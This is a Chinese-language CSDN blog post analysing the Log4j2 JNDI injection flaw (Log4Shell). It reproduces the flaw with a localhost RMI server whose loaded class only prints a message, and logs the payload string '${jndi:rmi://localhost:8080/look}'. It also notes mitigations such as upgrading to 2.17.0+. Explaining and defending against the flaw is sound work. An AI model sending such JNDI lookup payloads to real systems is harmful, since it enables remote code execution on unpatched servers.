Java日志:log4j JNDI漏洞分析

最新推荐文章于 2024-05-06 22:39:28 发布
最新推荐文章于 2024-05-06 22:39:28 发布
阅读量1.1k 收藏
点赞数
分类专栏: # java周边技术 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yal_insist/article/details/124213947
版权

2021-12左右,log4j被爆出一个整个行业都要改的漏洞。究竟是什么漏洞这么牛掰?下面我带大家看一下。
该漏洞会在log4j2.x 而且 <=log4j2.15版本下出现。

1.漏洞原理

“ Lookups provide a way to add values to the Log4j configuration at arbitrary places. They are a particular type of Plugin that implements the StrLookup interface. ”

以上内容复制于log4j2的官方文档lookup。其清晰地说明了lookup的主要功能就是提供一种方式:使用者以某种约定的格式就可以将某些特殊的值添加到日志中

参考博客:Log4j2研究之lookup

这些特殊的值可以来源于java运行的环境、docker、profile文件、jndi等。
而jndi就可以远程调用第三方的接口拿到一些特殊的值。当黑客如果想办法给日志注入jndi代码来请求自己的rmi服务,就可以让目标服务器执行自己的代码,系统的代码如下所示

User user = Util.getCurrentUser(); 
// username为${jndi:rmi://localhost:8080/look}
logger.error("用户名:{}", user.getUsername());

在这里插入图片描述

2.问题复现

2.1 注册RMI服务器

package bugReappear;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RmiServer {

    public static void main(String[] args) {
        try {
            Registry registry = LocateRegistry.createRegistry(8080);
            registry.bind("look", new ReferenceWrapper(new Reference(null, "bugReappear.Look", null)));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

package bugReappear;

public class Look {

    static {
        System.out.println("Look被执行了");
    }
}

2.2 目标服务器打印日志

<!-- 引入log4j-slf4j-impl,这个是slf4j的log4j实现的依赖 -->
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-slf4j-impl</artifactId>
    <version>2.14.1</version>
</dependency>

在这里插入图片描述

package bugReappear;

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

public class Log4jBug {

    public static void main(String[] args) {
        Logger logger = LoggerFactory.getLogger("log4j2");
        logger.error("helloworld");
        logger.error("{}登录成功", "${java:vm}");
        logger.error("用户名:{}", "${jndi:rmi://localhost:8080/look}");
    }
}

2.3 复现结果

开启RMI服务器之后,执行目标服务器的打印日志代码结果如下所示,目标服务器执行了RMI服务器上的代码。
在这里插入图片描述

3.解决办法

在这里插入图片描述
如果log4j版本<=2.15,上图中官方已经给出了相应的解决方案
在这里插入图片描述
当然,如果想永久解决好这个问题,当然是升级log4j版本,升级到log4j 2.17.0+就好了。在log4j官方文档中的jndi有段描述,log4j 2.17.0开始默认会不允许jndi来获取配置,如果要打开则要进行配置。
在这里插入图片描述

我叫985
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Log4j2的JNDI注入漏洞原理分析与思考
uuuyy_的博客
12-23 2610
前言 最近Log4j2的JNDI注入漏洞(CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。 以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。 一、 前置知识 1.1 Log4j2 Log4j2是一个Java日志组件,被各类Java框架广泛地使用。它的前身是Log4jLog4j2重新构建和设计了框架,可以认为两者是完全独立的两个日志
CVE-2021-44228:Apache Log4j2 JNDI注入漏洞
qq_61553520的博客
05-24 1116
Log4j是Apache软件基金会下的一个开源项目,通过使用log4j可以打印程序日志输出信息到控制台,文件等各种地方。简单来说,它是一个用于记录日志Java第三方库,而且使用量非常广泛。在2021年12月9日,Log4j2爆出极其严重的漏洞,攻击者只需要构造恶意数据植入日志记录,就可以导致任意代码执行,危害极大,利用门槛极低。
2024年网络安全最全【紧急】Apache Log4j任意代码执行漏洞安全风险升级修复教程,网络安全教程
最新发布
2401_84263282的博客
05-06 983
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
Log4j2 Jndi 漏洞原理解析、复盘
君一席
12-13 1753
“ 2021-12-10一个值得所有研发纪念的日子。” 一波操作猛如虎,下班到了凌晨2点25。 基础组件的重要性,在此次的Log4j2漏洞上反应的淋漓尽致,各种“核弹级漏洞”、“超高危” 等词汇看的我瑟瑟发抖,那么问题真的有那么严重吗?这个让大家普遍加班搞到凌晨的漏洞,到底是什么问题? 01 — 漏洞解析、复现 Log4j2的框架设计非常优秀,各种功能均是以内部插件的方式进行的扩展实现,比如我们经常在Xml定义的,实际对应的则是如下的AppendersPlugin对象 而我们在Xml Appenders
扩展Log4j支持JNDI数据源
weixin_33816821的博客
04-04 283
log4j.properties配置文件: log4j.rootLogger=INFO,db #使用log4j扩展支持JNDI数据源 log4j.appender.db=com.qdgswx.log4j.ds.JndiDSAppender log4j.appender.db.jndiName=wstjndi log4j.appender.db.BufferSize=1 log4...
Java的一个日志Log4j2高危漏洞
直到世界尽头
12-14 4485
log4j的远程访问漏洞
log4j2.17.2
04-14
Log4j2漏洞(CVE-2021-44228)的本质在于,攻击者可以通过操纵日志输入,触发JNDIJava Naming and Directory Interface)查询,进而执行任意远程代码。这个漏洞的严重性在于,它允许攻击者无需任何权限即可完全...
log4j2漏洞检测工具
05-07
Log4j2,一个广泛使用的Java日志框架,最近曝出的重大安全漏洞(CVE-2021-44228,被称为Log4Shell)引起了全球的关注。这个漏洞允许攻击者通过精心构造的日志输入执行远程代码,从而对系统造成严重威胁。为了解决这...
log4j远程执行漏洞,测试源码
12-22
2021年12月,研究人员发现了一个允许任意代码执行的严重漏洞,它存在于Log4j 2的JNDIJava Naming and Directory Interface)查找功能。攻击者只需要在日志消息插入特定的恶意格式字符串,就能触发远程代码执行...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
Apache Log4j2 是一个广泛使用的Java日志框架,它为开发者提供了强大的日志记录功能。然而,在2021年12月初,一个严重的安全漏洞(CVE-2021-44228)被公开,这个漏洞被称为"Log4Shell",允许攻击者通过注入恶意的...
log4j-2.18.0
08-04
然而,这次的2.0及以上版本的log4j2发现的安全漏洞,使得恶意用户能够通过精心构造的输入,触发JNDIJava Naming and Directory Interface)查找,进而执行任意远程代码。 Log4Shell漏洞的核心在于log4j2的...
log4j\c3p0\jndi详细配置实例
12-16
log4j\c3p0\jndi详细配置实例
Log4j2 Jndi 漏洞原理解析
课嗨教育的专栏
01-01 2535
漏洞解析、复现 Log4j2的框架设计非常优秀,各种功能均是以内部插件的方式进行的扩展实现,比如我们经常在Xml定义的<Appenders>,实际对应的则是如下的AppendersPlugin对象 而我们在Xml Appenders下所定义的<Console>实际对应的则是如下的ConsoleAppender对象 看到这里应该就知晓了,我们在配置文件所配置的各种元素实际上对应的均是Log4j2的各种插件对象,Xml在被解析过程当,会将你所配置的各种元素名..
java最新漏洞_最新Java 0day漏洞分析及EXP下载(CVE-2012-4681)
weixin_39811193的博客
02-12 694
*本文涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。FireEeye在8月27日发布了一个新的java 0day的一些相关信息,该漏洞影响浏览器的JRE[1.7.x]插件,影响非常大,攻击者可利用该漏洞进行挂马攻击。在捕获的样本发现使用了Dadong's JSXX 0.44 VIP加密方式。该java程序包含了以下两个类文件:(-...
Log4j2与JNDI结合
cloud的技术积累
06-04 4406
Log4j2和JNDI结合指定配置文件路径和日志文件
Log4j 远控JNDI漏洞: 原理?如何解决?
缘字诀的博客
12-12 2606
Log4j 远控JNDI漏洞: 原理?如何解决?
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 5581
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务Log4j2 在特定的版本由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息替换变量的函数,是通过配置文件的${}语法调用的,例如:如果在日志消息使用了,那么 log4j2 将使用 lookup 函数从系统属性查找名为 “my.property” 的属性值,并将其替换为实际值。
JNDI&RMI&LDAP介绍+log4j分析
enhengzZ的博客
02-16 1529
JNDI JNDIjava Naming and Directory Interfac即java命名与目录接口 Naming是命名服务,Director指目录服务。 通过调用JNDI的API应用程序可以定位资源和其他程序对象。JNDIJava EE的重要部分,,JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA。 命名服务 对资源命名方便下次调用,Naming的资源要唯一,每一个资源绑定一个名字 目录服务 顾名思义,和计算机的文件系统很像,具体来说,dns就是一
JAVA安全之Log4j-Jndi注入原理以及利用方式
shelter1234567的博客
11-08 2298
log4j2是2021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式
log4j2漏洞原理 利用方式 应用场景
05-12
Log4j2 是一个 Java 日志框架,广泛应用于各种 Java 应用程序。而 Log4j2 漏洞则是指在使用 Log4j2 版本小于 2.15.0 时,攻击者可以利用该漏洞通过构造恶意的日志信息来执行任意代码,从而控制受害者的服务器。 漏洞原理: Log4j2 框架JNDI 注入漏洞是该漏洞的原因。攻击者可以通过构造恶意的日志信息来触发 JNDI 查询,然后向返回的 JNDI URL 发送恶意 RMI 请求,从而在受害者服务器上执行任意代码。 利用方式: 攻击者可以通过构造特定的日志信息,将恶意代码注入到受害者的 Log4j2 实例,从而触发 JNDI 查询并通过恶意 RMI 请求执行远程命令。具体利用方式包括: 1. 通过 Web 应用程序的日志功能触发漏洞。 2. 通过 Java 应用程序的日志功能触发漏洞。 3. 通过通过 Spring Boot 应用程序的日志功能触发漏洞。 应用场景: 该漏洞对于使用 Log4j2 框架的 Java 应用程序是一个严重的安全威胁,攻击者可以在不需要身份认证的情况下执行任意代码,从而完全控制受害者服务器。因此,所有使用 Log4j2 框架的应用程序都应该尽快升级到版本 2.15.0 或更高版本以避免该漏洞的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我叫985

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值